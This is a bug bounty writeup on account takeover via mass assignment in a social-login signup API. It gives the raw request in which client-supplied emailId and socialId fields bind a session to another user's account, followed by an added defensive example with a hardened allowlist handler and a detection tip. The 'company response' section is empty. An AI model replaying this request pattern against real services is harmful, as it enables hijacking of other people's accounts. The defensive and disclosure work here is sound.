Story of Account Takeover: Using Social Login with Mass Assignment Vulnerability to hack accounts!

This is my first writeup about the Account Takeover which I found on a private program.

POST /signup/users/socialLogin HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 834
Host: api.redacted.com
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.2.1

{"profile_picture":"http://graph.facebook.com/3061xxxxxxxxx/picture?type=large","emailId":"example@gmail.com","socialType":"FB","fname":"test","pincode":"","dob":"","mobile":"","city":"","gender":"","androidId":"3c91804d96d13669","deviceToken":"xxxx","appVersion":"1.0.0|10","country":"","socialId":"306199919","addressl2":"","lname":"Test"}
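The request above carries the identity fields (emailId, socialId, socialType) in the client-controlled JSON body and no provider token, so a handler that copies the body straight into the account record lets the caller decide which account the new session is bound to. The following is an added example, not code from the writeup or the affected program: it puts a mass-assignment-prone handler next to a hardened one that accepts only an allowlist of profile fields and takes emailId/socialId from a provider-side token check. The allowlist, the accessToken field, the verify callback and the sample body are all assumptions constructed for the example.

```python
"""Social-login signup: mass-assignment prone handler vs. an allowlisted one."""
import json
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Tuple

# Profile fields the client may set about itself (constructed allowlist, not the
# program's real schema). Identity fields are deliberately absent.
CLIENT_WRITABLE = {
    "fname", "lname", "pincode", "dob", "mobile", "city", "gender",
    "androidId", "deviceToken", "appVersion", "country", "addressl2",
}


@dataclass(frozen=True)
class ProviderIdentity:
    """What the identity provider itself asserts about the token holder."""
    provider: str   # e.g. "FB"
    subject: str    # provider's stable user id
    email: str      # provider-verified e-mail


TokenVerifier = Callable[[str, str], ProviderIdentity]


def vulnerable_social_login(body: Dict[str, Any]) -> Dict[str, Any]:
    """Mass assignment: every key in the JSON body lands in the account record,
    so the caller chooses which emailId/socialId the session is bound to."""
    return dict(body)


def hardened_social_login(body: Dict[str, Any], verify: TokenVerifier
                          ) -> Tuple[Dict[str, Any], List[str]]:
    """Bind identity to provider-verified data; copy only allowlisted fields.
    Returns the account record and the list of body keys that were ignored."""
    token = body.get("accessToken")          # hypothetical field, see lead-in
    social_type = body.get("socialType")
    if not token or not social_type:
        raise ValueError("provider token and socialType are required")
    ident = verify(social_type, token)       # must raise if the token is invalid

    account = {k: v for k, v in body.items() if k in CLIENT_WRITABLE}
    # Identity comes from the provider, never from the request body.
    account["emailId"] = ident.email
    account["socialId"] = ident.subject
    account["socialType"] = ident.provider

    ignored = sorted(set(body) - CLIENT_WRITABLE - {"accessToken", "socialType"})
    return account, ignored


# Constructed stand-in for a real provider lookup (e.g. a Graph API /me call);
# a real verifier would also check the token's app id/audience and expiry.
_FAKE_PROVIDER = {
    ("FB", "tok-caller"): ProviderIdentity("FB", "900001", "caller@example.com"),
}


def fake_verify(provider: str, token: str) -> ProviderIdentity:
    """Resolve (provider, token) to the identity the provider vouches for."""
    try:
        return _FAKE_PROVIDER[(provider, token)]
    except KeyError:
        raise PermissionError("token rejected by provider") from None


# Constructed request body mirroring the shape of the one in the writeup: the
# client supplies an emailId/socialId that do not belong to the token holder.
SAMPLE_BODY = json.loads(
    '{"profile_picture":"http://graph.facebook.com/1/picture",'
    '"emailId":"someone-else@example.com","socialType":"FB","fname":"test",'
    '"socialId":"123456","lname":"Test","accessToken":"tok-caller",'
    '"appVersion":"1.0.0|10"}'
)

if __name__ == "__main__":
    print(vulnerable_social_login(SAMPLE_BODY)["emailId"])   # someone-else@example.com
    acct, ignored = hardened_social_login(SAMPLE_BODY, fake_verify)
    print(acct["emailId"], ignored)   # caller@example.com ['emailId', 'profile_picture', 'socialId']
```

The detection angle for defenders is the `ignored` list: a signup or login request that tries to set identity fields the server does not accept is worth logging, since legitimate clients have no reason to send them.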

Response from the company:

Connect with me on my LinkedIn and Twitter

LinkedIn: https://www.linkedin.com/in/mohammad-kaif-security/

Twitter: https://twitter.com/_mkahmad
